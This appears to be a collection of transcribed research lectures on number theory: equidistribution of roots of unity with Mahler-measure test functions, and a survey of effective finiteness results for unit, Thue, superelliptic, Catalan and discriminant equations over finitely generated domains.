zeta has order p — are the nontrivial elements of the unique subgroup of order 3 in the multiplicative group F_p star. This of course requires us to suppose that p is congruent to 1 mod 3; then there is a unique subgroup of order 3 in F_p star, we take that group, take its two nontrivial elements, and look at this tuple.
What we average is the test function along this tuple. The polynomial here is t1 plus t2 plus t3 — so it is in dimension 3, I guess, but you can reduce it to something in dimension 2 if you like, by de-homogenizing — and the test function is just the logarithm of the absolute value of p. Here p minus 1 is just the number of roots of unity of order exactly p, and the theorem is that this average converges to the Mahler measure, just as predicted by the conjecture, plus an error term that goes to 0. The delta invariant of this tuple can be computed, and this gives an even more precise way of stating convergence: the difference goes to 0 as p goes to infinity at this rate. Let me also mention a fact about this Mahler measure: it was computed by Chris Smyth to be equal to the value of the derivative of a certain L-function at the point minus 1. This value can be approximated numerically, and it is a positive real number. Let me stop here; this is some evidence towards the conjecture in dimension greater than 1. As the next point, I want to state a result for a class of polynomials in d variables for which we know the conjecture is true, and for that I need to introduce the notion of atoral polynomials. Atoral polynomials appear in the literature: I believe they appeared in work of Agler, McCarthy, and Stankus in 2006, and later in slightly different form in work of Lind, Schmidt, and Verbitskiy. We will introduce yet another variant of what it means for a polynomial to be atoral; these definitions are not completely equivalent, but they are in a similar spirit, and we chose the definition best suited to our method. So let us start with any polynomial p in d variables with complex coefficients, and look at its zero set not on affine d-dimensional space but on the d-dimensional torus, the points where each coordinate has complex absolute value 1. This set is not complex algebraic, because the unit circle is certainly not complex algebraic, but it is a real algebraic subset of C to the d; I will show you pictures later of how such a set can look. Now the important feature we have in the complex plane is that we can complex conjugate, and on the unit circle the complex conjugate of a point is just its inverse. So if we have a solution of this equation on the torus and take the complex conjugate of the whole package, the coordinates get inverted and the coefficients of p get conjugated. So for any point of this zero set we actually get a second relation, and this second relation may or may not be independent of the first. If, for example, p has real coefficients and is symmetric with respect to this inverting operation up to a monomial factor, then this will not give us a new relation. But sometimes you do get a new relation, and generically you would expect this to happen; by a new relation I mean that we get a second polynomial that is coprime to the first one up to a monomial. Then we will say that that is a situation we can deal with.
The precise definition of atoral is as follows: we say that the polynomial p is atoral if there exist coprime polynomials r and s — allowed to have complex coefficients again, or, if we are working over a smaller field, with coefficients in that smaller field — inducing different relations, such that the zero set of p on the d-torus is contained in the common zeros of r and s. If, for example, the two relations above are honestly independent, then we can build such polynomials out of them; in general they may not be, but there may be other coprime polynomials r and s whose common zero set contains A. This happens to be equivalent to saying that the dimension of A is at most d minus 2. Remember, A is a real algebraic set, so there is a notion of dimension of real algebraic sets, and it is certainly at most d minus 1 because p is a nonzero polynomial; if it is at most d minus 2, that is the atoral case. In a sense, being of dimension d minus 2 is the generic situation, because from the real algebraic point of view these are two conditions — the real and the imaginary part of p vanish at the point — so generically you remove two dimensions from d. But in general there are polynomials that are not atoral, and I will show you an example in a moment. In dimension d equals 1, being atoral just means that the polynomial does not vanish on the unit circle: two coprime polynomials in one variable have no common roots, so this set is empty. For d equals 2, the common zero set of two coprime polynomials in two variables is a finite set, so being atoral just means that the set A is finite. For larger d it is not so straightforward to formulate, but for example the linear polynomial t1 plus t2 plus ... plus td is atoral, because you can cook up two coprime polynomials from this kind of relation. Not all polynomials are atoral; there are obvious cases for d equals 1, and for d equals 2 you can look, for example, at Blaschke products. I have prepared a small image — I have switched to a browser, I hope there is no problem with screen sharing. This is an example of a polynomial that you can construct using a Blaschke product; it is of the form 2xy minus x minus y plus 2, the blue torus here corresponds to the two-dimensional torus S1 cross S1, and the intersection of the complex zero set of this two-variable polynomial with S1 cross S1 is represented by this red curve. This red curve is something of real dimension 1, so this is not an atoral polynomial; we will see that this is difficult to treat with our methods. I am returning to my notes now; I hope there has not been a problem. Okay, let me continue, and let me say something about what is known in this atoral setup.
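Before the results, the definition just given can be recorded in symbols (this is my transcription of the slide, with Laurent polynomials allowed up to monomial factors):

$$\mathcal{A}\;=\;\bigl\{z\in(\mathbb{C}^{\times})^{d}:\ |z_1|=\dots=|z_d|=1,\ p(z)=0\bigr\},$$

and $p$ is atoral if there exist coprime $r,s$ with

$$\mathcal{A}\ \subseteq\ \{r=0\}\cap\{s=0\};$$

equivalently, $\dim_{\mathbb{R}}\mathcal{A}\le d-2$.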
This is a result by Lind, Schmidt, and Verbitskiy, using their definition of atoral, which is slightly different from ours but which in this special case, I think, corresponds to ours, at least for irreducible polynomials. They show that if we average this test function, then in the limit we get the Mahler measure; we are not averaging over Galois orbits, but over finite subgroups of the multiplicative group to the d. They also have a notion of delta of G, which just means that the points of these finite subgroups equidistribute in the classical sense as we run along the sequence. So they have convergence for finite subgroups under the atoral condition. Again, if the polynomial does not vanish at all on the torus, then convergence follows from the classical results, because the test function is continuous. There was a previous result by the same three authors from 2010 under the condition that the vanishing locus of the polynomial on the d-torus is finite. Remember, atoral is weaker: it essentially means that the vanishing locus has real dimension at most d minus 2, so starting from dimension 3 finiteness is a stronger condition than being atoral. Finally, Dimitrov in his PhD thesis, 2017, dropped the hypothesis on p, so there is no atoral hypothesis, but he allowed only subgroups of a special type, the n-torsion subgroups. So what is our result? We are back in the Galois orbit setting; this is joint work with Vesselin Dimitrov. We have an atoral polynomial, so the same hypothesis as in the work of Lind, Schmidt, and Verbitskiy, but we average over the Galois orbit as opposed to finite subgroups, and we get that the limit equals the Mahler measure of p, again under the assumption that delta goes to infinity. A few remarks: we get a rate of convergence which is a small power of 1 over delta, and we work under a slightly weaker condition than atoral, something we call essentially atoral, which I can explain with this short picture. Remember, in the one-dimensional case there were these three situations. The first was somehow the trivial one: the function is continuous on S1. Then there is the case — there is a small flaw in the picture, this should be a singularity here — where the pole is at a root of unity, which was somewhat easy to treat. And then there is the case of a pole at a non-root of unity, which required Baker's linear forms in logarithms, or at least some version of them. In the higher-dimensional case we can have poles on the d-torus, but the pole set must not be too bad: in the atoral case it has real dimension at most d minus 2. We can also treat the case where the pole set is large, of dimension d minus 1, provided it comes essentially from an algebraic subgroup — just as in the picture, where minus 1 is an irreducible component of an algebraic subgroup. The general case, the analogue of the third one-dimensional case which requires Baker's linear forms in logarithms, is at the moment open in higher dimensions; further ideas are needed there. A small point: we do not really need to work over Q, we can also replace Q by a number field. All right.
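Schematically — with the exponent written as an unspecified $\kappa>0$, since the precise value and the implied constant are on the slide — the main theorem just described reads: for an essentially atoral polynomial $p$ with algebraic coefficients,

$$\frac{1}{[\mathbb{Q}(\boldsymbol\zeta):\mathbb{Q}]}\sum_{\sigma\in\operatorname{Gal}(\mathbb{Q}(\boldsymbol\zeta)/\mathbb{Q})}\log\bigl|p\bigl(\sigma(\boldsymbol\zeta)\bigr)\bigr|\;=\;m(p)\;+\;O\!\bigl(\delta(\boldsymbol\zeta)^{-\kappa}\bigr),$$

where $m(p)=\int_{[0,1]^d}\log\bigl|p\bigl(e^{2\pi i t_1},\dots,e^{2\pi i t_d}\bigr)\bigr|\,dt_1\cdots dt_d$ is the multivariate Mahler measure.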
Let me give a nice application of these equidistribution results. Look at the polynomial t1 plus t2 plus t3 plus t4; it happens to be atoral — just look at two of these relations, invert, and they are coprime as Laurent polynomials, which gives the two relations r and s. A nice feature is that the Mahler measure of p has been computed to this value; it is related to the zeta function. The actual value will not play a role for this; what is important is that it is positive. Now suppose we have four roots of unity zeta 1 to zeta 4 such that their sum is an algebraic unit. You will find examples if you look: take, for instance, e to the 2 pi i over 6 and e to the minus 2 pi i over 6, and then a further root of unity together with its negative; then the sum is exactly 1, an algebraic unit. What happens in that case? We can apply the theorem, which tells us that the average converges to the Mahler measure as delta goes to infinity. But if the sum is a unit, then the average is just the logarithm of the absolute value of the field norm, divided by the degree, and so it is zero. And then we have a problem: the Mahler measure is a positive constant, and something equal to zero cannot converge to something positive. So delta of zeta has to be bounded — a certain finiteness result. As a conclusion: if zeta 1 plus zeta 2 plus zeta 3 plus zeta 4 is an algebraic unit for some four roots of unity, then there has to be a multiplicative relation among these roots of unity with exponents bounded by some constant B. In this particular instance the relation is clear — there are many relations, for example zeta 1 to the 6 equals 1, and there are other relations involving zeta 1 times zeta 2, and so on. So you can get this kind of finiteness result out of equidistribution statements like this, connected to a conjecture of Ih, which was also a motivation in the work of Baker, Ih, and Rumely. Okay, let me say a few things about the proof of our theorem in the last ten minutes or so, going back to the univariate case. If we just have a polynomial in one variable, let us see what we can get there. The proposition that we prove in our paper is the following; we are back in the one-variable case, and later we will try to reduce to it. We take the average over a Galois orbit of a root of unity, plug it into our polynomial q, and the proposition says that in the limit this is the Mahler measure of q. The point of the proposition is that we get an explicit error estimate, explicit in all the data. There is an important hypothesis, namely the atoral hypothesis in dimension one: as you recall, being atoral in dimension one means that q does not vanish on the unit circle, and this is where atorality comes into the picture. Let me give an idea of the proof; it is rather straightforward here. We can assume that q is linear, by factoring the polynomial. Then what does the average look like? There are contributions to the average that are harmless, namely those conjugates that are not too close to alpha.
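In symbols, for a single linear factor and with a polynomial threshold (I write $n^{-2}$, the placeholder used in the talk), the average splits as

$$\frac{1}{\varphi(n)}\sum_{\substack{1\le k\le n\\ \gcd(k,n)=1}}\log\bigl|e^{2\pi i k/n}-\alpha\bigr|
\;=\;\frac{1}{\varphi(n)}\Biggl(\sum_{|e^{2\pi i k/n}-\alpha|\,\ge\, n^{-2}}\;+\;\sum_{|e^{2\pi i k/n}-\alpha|\,<\, n^{-2}}\Biggr)\log\bigl|e^{2\pi i k/n}-\alpha\bigr|,$$

where the first sum is the harmless part and the second sum contains at most one term, since distinct $n$-th roots of unity are much farther apart than $2n^{-2}$.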
There are actually no poles here, but alpha could still be very close to the unit circle. So first we sum over those conjugates of zeta that are not too close to alpha, meaning polynomially bounded away, with one over n squared as a placeholder. Then there is a remaining term with the bad guys, the ones we have to deal with later. Now, because the proximity here is one over n squared and these are roots of unity of order n, there can be at most one term in that remaining sum — at most one bad guy. The rest, phi of n minus one terms, we can handle: using just the standard equidistribution techniques, that part of the sum converges rather nicely to what you would expect, namely the Mahler measure of this univariate polynomial, which is log of the maximum of one and the absolute value of alpha. So that part of the sum is harmless. What we need to deal with is the remaining part, and as I said there is only one term there, but this one term can cause a lot of problems: even if alpha is not on the unit circle, we have to deal with the contingency that zeta, or some conjugate of it, is extremely close to alpha, which spoils this absolute value; so this could in principle be very negative, and we have to deal with that. The worst case scenario is when our average is log of the maximum of one and the absolute value of alpha — that is the Mahler measure — plus some pathologically negative term coming from a conjugate that is extremely close to alpha, plus an error term that I will not specify. Recall that this exceptional conjugate is of the form e to the 2 pi i q for some rational number q, and it is tempting to apply Baker's linear forms in logarithms at this point, just as in the work of Baker, Ih, and Rumely: the log of this conjugate would be 2 pi i q, the log of alpha is the logarithm of an algebraic number, and if these two are close, then suitable choices of logarithms are also close, so it is natural to try linear forms in logarithms. But, as was already observed by Duke in his 2007 work, in the current versions, even the state of the art of Baker's theory, even in the two-variable results, the dependency on the degree of the field of definition of alpha is not good enough to get a result here: the dependency is usually d cubed or something like that, and that will not be able to dominate the denominator here. So that unfortunately does not work, and we have to do something else, something that is almost a sacrilege. We have to bound this from below, and what is the first thing you learn at university? Probably the triangle inequality, and then there is the reverse triangle inequality if you just go the other way. Of course you pay a high price for that, usually much too high in any application in number theory, but in this setting it turns out to be good enough. So we bound the distance between zeta sigma and alpha from below just by the distance of alpha to the unit circle. This may seem like a blunder, but it actually happens to work in this situation. And why does it work?
Well, the situation we are interested in is when alpha is extremely close to the unit circle, and in that case the distance between alpha and the unit circle is roughly the distance between alpha and the inverse of its complex conjugate. If alpha were precisely on the unit circle, then the complex-conjugate inverse of alpha would be precisely alpha; in general they are reasonably close to one another. Now remember that alpha is not on the unit circle by hypothesis — no roots of q are on the unit circle — so this distance happens to be positive, which is already a good sign: we get a lower bound by something positive. But we need something a bit stronger, and for this we return to Mahler's results on separation of roots of polynomials. There is a result of Mahler from 1964: for two distinct roots of a polynomial with, in this case, integer coefficients, the distance between the two roots can be bounded from below by an expression that is essentially linear in the degree, with a dependency on the Mahler measure of f. If you plug in this result — you can use the polynomial that has alpha and the complex-conjugate inverse of alpha as roots — you can bound this difference from below, and the lower bound you get is good enough for the application, because the dependency on the degree is essentially linear; that leads to an essentially linear dependency in the degree in the end, and the phi of n wins. For our result we actually have to deal with several different alphas, because our polynomial is a product of linear terms as usual, so we need a result like Mahler's where we compare several pairs of roots, a separation result for pairs of roots. For this there is a result of Mignotte that strengthened Mahler's result to several pairs of roots, not just one, giving a lower bound for several pairs of the same quality as Mahler's. That gives us what we need in the univariate case. Then we have to reduce from the multivariate case to the univariate case. So let us now assume that p is atoral, and we have a tuple of roots of unity of order n. We can reduce to the univariate case by the basic observation that the coordinates of any tuple of roots of unity of order n are generated by a single root of unity of order n: I can write the bold zeta as the non-bold zeta raised to some exponent a, which is a vector, and for Galois conjugates I can do the same thing. I also have some freedom here, because I can always add a multiple of n to the exponent, since n is the order of zeta. Using this freedom, I construct a univariate polynomial starting from p using this exponent, and the game is then to choose the conjugate and this vector in such a way that the exponent is as small as possible, so that the resulting polynomial has degree as small as possible. It will be a univariate polynomial, so we can try to apply the earlier proposition to it; of course, the average does not change under this process, so we really do reduce to the univariate case. The price we pay is that the degree of this q can be very large — that is why I was so concerned about getting a good dependency on the degree in the univariate case.
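For orientation: the separation bound I believe is being invoked here is Mahler's 1964 inequality, which for a separable polynomial $f\in\mathbb{Z}[t]$ of degree $D\ge 2$ and distinct roots $\alpha\neq\beta$ gives (up to the exact constants, which may differ in the version used in the paper)

$$|\alpha-\beta|\;>\;\sqrt{3}\,D^{-(D+2)/2}\,M(f)^{-(D-1)},\qquad\text{so}\qquad -\log|\alpha-\beta|\;\ll\;D\log D+D\log M(f),$$

essentially linear in $D$. The reduction to one variable just described replaces $p$ by the univariate polynomial

$$q(t)\;=\;p\bigl(t^{a_1},\dots,t^{a_d}\bigr),\qquad \boldsymbol\zeta=(\zeta^{a_1},\dots,\zeta^{a_d}),$$

with the exponent vector $a$ chosen, modulo $n$, as short as possible.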
Using Erdős–Turán–Koksma, we get a bound for an optimal choice of this exponent, which decays in terms of delta of zeta; so we get some improvement over the trivial bound, some power of delta. Then we plug in the proposition, and, at least if delta grows quickly enough, the error term is small, which is what we want: if delta grows like n or some small power of n, then we get convergence. Let me briefly summarize what we have: if delta of zeta grows quickly, like some small power of n, we get a convergence result, but the Mahler measure appearing is again the Mahler measure of something univariate. As a next step, we have to compare this with the Mahler measure of p, the original polynomial, and for that we need a result of Lawton, or at least a variant of Lawton's result, which allows one to reduce the computation of a multivariate Mahler measure to univariate Mahler measures; we prove a quantitative version of this. We also have to deal with the situation where delta does not grow quickly. And the final thing is to deal with the situation where q vanishes on the unit circle — remember that was an important hypothesis in the proposition; without it our method does not work, so we have to make sure that the polynomial q we constructed does not vanish on the unit circle. Let me say a few words on that. If q happens to vanish on the unit circle, that is where the atoral condition comes into the picture: we then find a point on the d-torus and on the vanishing locus of p of this shape, and since our polynomial is atoral, this point is contained in the vanishing locus of the two coprime polynomials r and s. Then, using a result of Bombieri, Masser, and Zannier on unlikely intersections, we get a nice bound on a vector orthogonal to this exponent. Let me go to the final slide. If this vector c is orthogonal to the exponent, then I can take c as an exponent for zeta and I get one, which means that delta of zeta is at most B. So if there is a point on the unit circle contained in the vanishing locus of our q, then delta of zeta is bounded, and that finishes the proof, because we may assume that delta of zeta is as large as we wish. Let me conclude by showing two or three pictures. This is what happens for a typical atoral polynomial intersected with the d-torus: this red point, a single point; the yellow line is the algebraic subgroup that appears in Bombieri–Masser–Zannier. We can make it a bit more complicated — now it is x times y squared — and even more complicated; you see that the subgroup misses this point. Of course it could also hit the point in some cases, but the theorem of Bombieri, Masser, and Zannier tells us that this is somewhat rare and we can deal with that situation. Okay. To close off, here is a picture of Luminy taken from Mont Puget, in the background, three years ago. I hope to return to Luminy soon. Thanks for your attention. — Yes, thank you very much for this very interesting lecture and for this nice picture from Puget.
Maybe you know there is a fast track going down just off the place where you took the picture; it is part of a really very nice round tour of about three hours from the Institute. It is a pity that we cannot do that now. We still have some time for very quick questions. Are there questions or comments? Yes, there is a question — can you read it, Philipp? The question is whether there is a connection between the notion of atoral and the notion of tempered from Deninger. — No, I am not aware of the notion of tempered, but I would like to look into whether there is a connection. — Okay; Deninger is also interested in Mahler measures. I'm back again.
|
Roots of unity of order dividing $n$ equidistribute around the unit circle as $n$ tends to infinity. With some extra effort the same can be shown when restricting to roots of unity of exact order $n$. Equidistribution is measured by comparing the average of a continuous test function evaluated at these roots of unity with the integral over the complex unit circle. Baker, Ih, and Rumely extended this to test functions with logarithmic singularities of the form $\log|P|$ where $P$ is a univariate polynomial with algebraic coefficients. I will discuss joint work with Vesselin Dimitrov where we allow $P$ to come from a class of multivariate polynomials, extending a result of Lind, Schmidt, and Verbitskiy. Our method draws from earlier work of Duke.
|
10.5446/53725 (DOI)
|
Let me start with a short introduction. There is an extremely rich literature of finiteness results for Diophantine equations over number fields and, more generally, over finitely generated domains, that is, over domains of this form, where we assume that A contains Z and the generators are algebraic or transcendental elements over Q. Important examples are when A is Z, the ring of integers of a number field, a ring of S-integers, a polynomial ring over Z, and so on. If you want to get finiteness theorems it is necessary to assume that the ground domain is finitely generated over Z; otherwise you cannot get such results. In the first, survey part of my talk I shall mention the most important results. Most of the finiteness results are ineffective, that is, they do not provide any algorithm for finding the solutions; the most powerful method for obtaining ineffective finiteness theorems is the Thue–Siegel–Roth method. There are also effective finiteness results over number fields, which make it possible, at least in principle, to determine the solutions; the most powerful method here is Baker's method concerning linear forms in logarithms. There are also effective results over function fields, due to Mason and others; in that case one cannot get finiteness, only bounds for the heights of the solutions. In my talk I shall speak about the extension of effective finiteness results over number fields to the finitely generated case. Such a program was initiated in the 1980s in two papers of mine. The main idea is the following: reduce the equation over finitely generated domains to the number field case and the function field case by an effective specialization, and then use effective results over number fields and function fields. This method was applied to Thue equations, decomposable form equations and discriminant equations over a restricted class of finitely generated domains. In 2013, with Evertse, we refined my method and combined it with a result of Aschenbrenner from effective commutative algebra to establish a method for arbitrary finitely generated domains; we applied this to unit equations over finitely generated domains. Later, further applications of the general method were given to other classical equations, including Thue equations, superelliptic equations and Schinzel–Tijdeman equations by Bérczes, Evertse and myself, to generalized unit equations by Bérczes, to the Catalan equation by Koymans, and to discriminant equations and decomposable form equations recently by Evertse. These results have a great number of applications. In my talk I shall first give a brief historical overview, and in the second part I shall present some new general effective results on decomposable form equations over finitely generated domains; these results are joint with Evertse. Let me start with unit equations. Let A be as above, a finitely generated domain which may contain transcendental elements too, and let a, b, c be nonzero elements of A; consider this equation, where A star denotes the unit group of A, that is, the multiplicative group of invertible elements, which is known to be finitely generated. The first ineffective finiteness result over number fields was proved by Siegel almost 100 years ago, in an implicit way. Later Mahler obtained a similar result over this ring, and Parry extended it to the case when the ground ring is the ring of S-integers of a number field.
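All of these results concern the unit equation, which written out is

$$a x + b y = c,\qquad x,\ y\in A^{*},$$

with $a,b,c$ fixed nonzero elements of $A$ and $A^{*}$ the finitely generated group of units of $A$.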
And finally, Lang in 1960 proved this finiteness theorem in full generality. The first general effective finiteness results, with explicit bounds, were obtained in these papers in the 70s. It should be remembered that independently Sprindžuk, Kotov and Trelina obtained similar but slightly less general results, with less explicit constants. An equation of this form where the solutions belong to the S-units of a number field is called an S-unit equation. Explicit upper bounds have been obtained for the solutions; I should mention here the results of Bugeaud and myself, of Yu and myself, and of Le Fourn; the best known bound in terms of s was obtained last year. The equation has many applications. The proofs are based on Baker's method and its p-adic version; there are also some alternative effective methods, due to Bombieri and to Bombieri and Cohen over number fields, and to Murty and Pasten, von Känel, Matschke, Siksek, Bennett and others over Z. Generalization to finitely generated domains: let again A be as above, with quotient field K, and consider again this unit equation. We can choose from the set of generators a subset z1, ..., zq which is a maximal algebraically independent subset. Denote by A0 the ring generated by these over Z; it is in fact a polynomial ring. One can show that there are an element g in A0 and an element w in K star, integral over A0, such that this relation holds; in fact this can be done in an effective way. We say that A is effectively given if q, r and the minimal polynomials of z_{q+1}, ..., z_r are given; in this case g and w, and hence B, can be determined. It should be mentioned here — you will see this later — that it is more convenient to consider the unit equation in the larger ring B, which is again finitely generated; its unit group is also finitely generated, and it is easier to deal with this overring of A. From my results one can deduce the following: consider the unit equation over B; then it has only finitely many solutions in B star, and hence in A star as well. Further, if these parameters are effectively given, then the solutions of this equation can be effectively determined. A quantitative version was also given, with this bound for the size of the solutions, where the size will be defined later. The description of the method would be rather long and complicated, so I shall mention only the basic idea. The first step is to reduce the equation to the number field case and the function field case; in the number field case one can apply many effective ring homomorphisms, that is, specializations, to obtain the required result. For any u in Z to the q there is a ring homomorphism from A0 to Z obtained by substituting u_i for z_i for i from 1 to q. This map can be extended to a ring homomorphism from B to Q bar which sends this equation to an S-unit equation in a number field depending on u. The second step is to use effective results over number fields and function fields to get an algorithm for solving this unit equation. The method works for B itself, for polynomial rings over Z, and for certain further finitely generated domains of this form. In general, the problem at the time was that no general algorithm was known to select those solutions in B star for which x and y belong to A star. The generalization to the arbitrary finitely generated case was made together with Evertse.
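Schematically, the specialization step just described is the following (a sketch; the exact construction of the overring $B$ is the one on the slides):

$$\varphi_{\mathbf u}\colon A_0=\mathbb{Z}[z_1,\dots,z_q]\to\mathbb{Z},\quad z_i\mapsto u_i\ (1\le i\le q),\qquad \mathbf u\in\mathbb{Z}^{q},$$

extended to a ring homomorphism $\varphi_{\mathbf u}\colon B\to\overline{\mathbb{Q}}$, under which $ax+by=c$ is mapped to an $S$-unit equation

$$\varphi_{\mathbf u}(a)\,\varphi_{\mathbf u}(x)+\varphi_{\mathbf u}(b)\,\varphi_{\mathbf u}(y)=\varphi_{\mathbf u}(c)$$

in a number field depending on $\mathbf u$.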
In what follows another representation for A will be given. Put R equal to the polynomial ring Z[X1, ..., Xr] and consider the ideal I of those polynomials which vanish at (z1, ..., zr); then A is isomorphic to R modulo I, and I is finitely generated. By definition, in this representation we say that A is effectively given if a set of generators of I is given, say f1, ..., ft. For an element alpha of A we denote by alpha tilde a representative of alpha, that is, a polynomial in R with alpha equal to alpha tilde evaluated at z1, ..., zr. Of course every element has infinitely many representatives, and we say that alpha is effectively given if we have a representative of alpha. Consider again the original unit equation in A star. We proved with Evertse the following theorem: if A and a, b, c in A are effectively given, then the solutions of this equation can be effectively determined. As mentioned above, the method of proof consists of refining my specialization method and combining it with the following theorem of Aschenbrenner from commutative algebra: let g1 and so on be elements of this polynomial ring and assume that this equation is solvable in R; if g1 and so on are given, then the equation has an effectively computable solution in R. In fact, Aschenbrenner gave a quantitative version of this result. Combining this theorem with our results, one gets an algorithm for deciding whether solutions x, y in B star are contained in A star or not. We also proved a quantitative version of Theorem B. To state it we have to introduce the so-called size of elements: for an element alpha of R, the degree of alpha is its total degree as a polynomial, and the logarithmic height of alpha is the logarithm of the maximum absolute value of its coefficients; the size of alpha is then defined as the maximum of these quantities. Of course there are only finitely many alpha in this polynomial ring with bounded size, and all of them can, at least in principle, be determined effectively. The quantitative version of Theorem B: assume that r is at least 1, otherwise the statement is trivial. Let a tilde, b tilde, c tilde be representatives for a, b, c in R, and assume that f1, ..., ft and a tilde, b tilde, c tilde all have degree at most d and logarithmic height at most h. Then for each solution x, y of this unit equation there are representatives x tilde, x prime tilde, and so on, of x, x inverse, y, y inverse, such that this inequality holds, where c1 is an effectively computable absolute constant. It is easy to deduce the finiteness statement of Theorem B from this bound. It should be mentioned that, as you can see, the bound is doubly exponential; the quantitative version of Aschenbrenner's theorem is responsible for this — using Baker's method alone, only one exponential would be needed. Thue equations: the following classical equations are Thue equations. Let again A and K be as above, and consider a binary form F in x and y with coefficients in A such that F has no multiple factors; then this is called a Thue equation. The first very important result was obtained by Thue in 1909 over Z, and that is why these equations are named after Thue. This result was generalized by many people in an ineffective way, and finally Lang proved in 1960 that over an arbitrary finitely generated domain the Thue equation has only finitely many solutions. In fact, Lang deduced this theorem as a consequence, or special case, of a more general result, a more general version of Siegel's theorem from 1929.
Siegel proved the case when K is a number field, and Lang extended it to the case when K is an arbitrary finitely generated field: if we have an absolutely irreducible polynomial such that the affine curve it defines has genus at least one, then this curve has only finitely many points with coordinates in A. From this one can deduce the finiteness result for Thue equations. Effective finiteness results: the first effective result over Z was obtained by Baker, who, using his famous method, derived explicit upper bounds for the solutions of Thue equations over Z. This was extended by Coates to this case, and later Kotov and Sprindžuk went further, proving effective finiteness results over the ring of integers of a number field. Several improvements have been obtained; one can mention here the names of Feldman, Stark, Sprindžuk and so on. All these proofs are based on different versions of Baker's method. In 1983 this was extended to the restricted classes of finitely generated domains considered above. To state the general result: if generators f1, ..., ft of the ideal I and representatives of the coefficients are given, then the solutions x, y of the Thue equation can be effectively determined. We proved this theorem together with Bérczes and Evertse and gave an effective version; the proof used the method of Evertse and myself mentioned above. It is a major open problem to make the Siegel–Lang theorem effective, first of course over Z and then over A; this seems very hard for the moment. Superelliptic equations: consider a polynomial f with coefficients in A, assume that f has no multiple zeros, and consider this equation, which is called superelliptic if m is at least three and hyperelliptic if m equals two. The first ineffective finiteness result was also obtained by Siegel, in 1926, over number fields, and later LeVeque gave a finiteness criterion over number fields. Lang deduced the finiteness result over arbitrary finitely generated domains from the general version of the Siegel–Lang theorem. Effective results: Baker was also the first to give an explicit upper bound for the solutions of such an equation in the classical case, when the ground ring is the ring of integers. This was extended by Sprindžuk, Brindza and others to the number field case, and Schinzel and Tijdeman proved that even m can be bounded above effectively if the parameters of the equation are effectively given. Brindza extended the result to the domains considered above in my earlier work. With Bérczes and Evertse we proved, in the same paper as the Thue equations, that if A and the coefficients of the polynomial are effectively given, then this superelliptic equation has only finitely many solutions, all of which can be effectively determined; we also gave an effective bound for m, and formulated and proved a quantitative version, too. Generalized unit equations: let again A and K be as above, let F be a polynomial in x and y with coefficients in A, consider a finitely generated subgroup gamma of K star, and assume that this condition holds; then consider the equation F(x, y) = 0 in units of A, or more generally in gamma. We shall denote this by (GU), the generalized unit equation. Lang proved the following ineffective finiteness result: this equation has only finitely many solutions in A star, and more generally in gamma.
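Written out, the generalized unit equation is

$$\text{(GU)}\qquad F(x,y)=0,\qquad x,\ y\in\Gamma,$$

where $F\in A[X,Y]$ and $\Gamma\subset K^{*}$ is a finitely generated subgroup; the non-degeneracy condition imposed on $F$ is the one displayed on the slide.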
Lang conjectured the same with gamma replaced by gamma bar, its division group, which consists of elements of this type. Liardet later proved Lang's conjecture, in an ineffective form. Effective finiteness results in number fields: first Bombieri and Gubler, and later Bérczes, Evertse and myself, and then Bérczes, Evertse, Pontreau and myself proved such results in an effective form, in gamma, in gamma bar, and so on. Finally, Bérczes in 2015 proved in full generality the following effective result: if A and gamma are finitely generated and A, gamma and F are effectively given, then the equation (GU) has only finitely many solutions; he also gave an effective quantitative version. The Catalan equation: let A be as above and consider the famous Catalan equation. Catalan conjectured, in the classical case when A is Z, that 3 squared minus 2 cubed equals 1 gives its only solution. Tijdeman proved the famous result that if A is the classical ring, the ring of integers, then this equation has only finitely many solutions, and all of them can, at least in principle, be determined effectively; unfortunately the effective bound was too large for practical use. Later Brindza, Tijdeman and myself extended this to the case when the ground ring is the ring of integers of a number field, Brindza extended it to the case when the ground ring is a ring of S-integers, and Brindza went further, considering the equation over a class of finitely generated domains; in these proofs Baker's method was involved. Later, Mihailescu proved the conjecture over Z with a different, algebraic method. Three years ago, Koymans proved the following general result: if A is an effectively given finitely generated domain, then the Catalan equation over A has only finitely many solutions, and he proved this in an effective and quantitative form. Discriminant equations: let again A and K be as above, let L denote a finite extension of K, and let d be a nonzero element of A. Many different problems can be reduced to a discriminant equation of this form, where the unknowns are monic polynomials with the indicated property. We say that two such polynomials f(X) and f(X + a), where a is an element of A, are A-equivalent; in this case it is easy to see that they have the same discriminant. Ineffective finiteness results had been obtained over Z for polynomials of low degree by Delone and Nagell. Later it was proved in full generality that if we assume that A is integrally closed in K, then this equation (D1) has only finitely many A-equivalence classes of solutions. This result has several consequences. For example, if L is a finite extension of K and A_L is the integral closure of A in L, then we consider this equation, this time in elements of A_L; we say that alpha and alpha plus a, with a in A, are A-equivalent, and in this case they have the same discriminant. From the above result it follows that, up to A-equivalence, the equation (D2) has only finitely many solutions in A_L. The next equation, (D3), is A_L equals A[alpha], where the unknown alpha belongs to A_L. This is equivalent to saying that 1, alpha, and so on form a power integral basis of A_L over A. If alpha is a solution of this equation, then so is epsilon alpha plus a, where epsilon is a unit in A and a is an element of A.
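To summarize the three equations in symbols (the degree and other side conditions are as on the slides): with $d$ a fixed nonzero element of $A$,

$$\text{(D1)}\quad D(f)=d,\ \ f\in A[X]\ \text{monic, up to }f(X)\sim f(X+a),\ a\in A;$$
$$\text{(D2)}\quad D(\alpha)=d,\ \ \alpha\in A_L,\ \text{up to }\alpha\sim\alpha+a,\ a\in A;$$
$$\text{(D3)}\quad A_L=A[\alpha],\ \ \alpha\in A_L,\ \text{up to }\alpha\sim\varepsilon\alpha+a,\ \varepsilon\in A^{*},\ a\in A,$$

where $D(\cdot)$ denotes the discriminant (of the polynomial, respectively of the element over $A$, as defined on the slides).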
Again, from this theorem concerning polynomials it follows that, up to multiplication by elements of A* and translation by elements of A, there are only finitely many alpha with this property; that is, there are only finitely many power integral bases. The method of proof: first one can reduce equation (D1) to unit equations, then (D2) to equation (D1), and finally (D3) to equation (D2). Effective finiteness results concerning equations (D1), (D2) and (D3). The first effective results, over Z and over number fields, were obtained in the 70s. The method of proof was to reduce the equation to unit equations and use Baker's method. The general case: let again A be a finitely generated domain, which may contain transcendental elements, with quotient field K, and let L be a finite extension of K. We say that L is given effectively if an irreducible polynomial P with coefficients in K is given such that this isomorphism holds. We proved with Evertse the following theorem. Assume that A is integrally closed; then, up to A-equivalence, equation (D1), that is the equation concerning polynomials, has only finitely many solutions (this was already proved before); further, if A, L and D are given, all solutions can be determined effectively. The second part, the effective part, was new. The condition that A is integrally closed can be weakened to the condition that a certain factor group is finite, where A_K is the integral closure of A in K and A+ denotes the additive group of A; and this condition is decidable. Similar results were 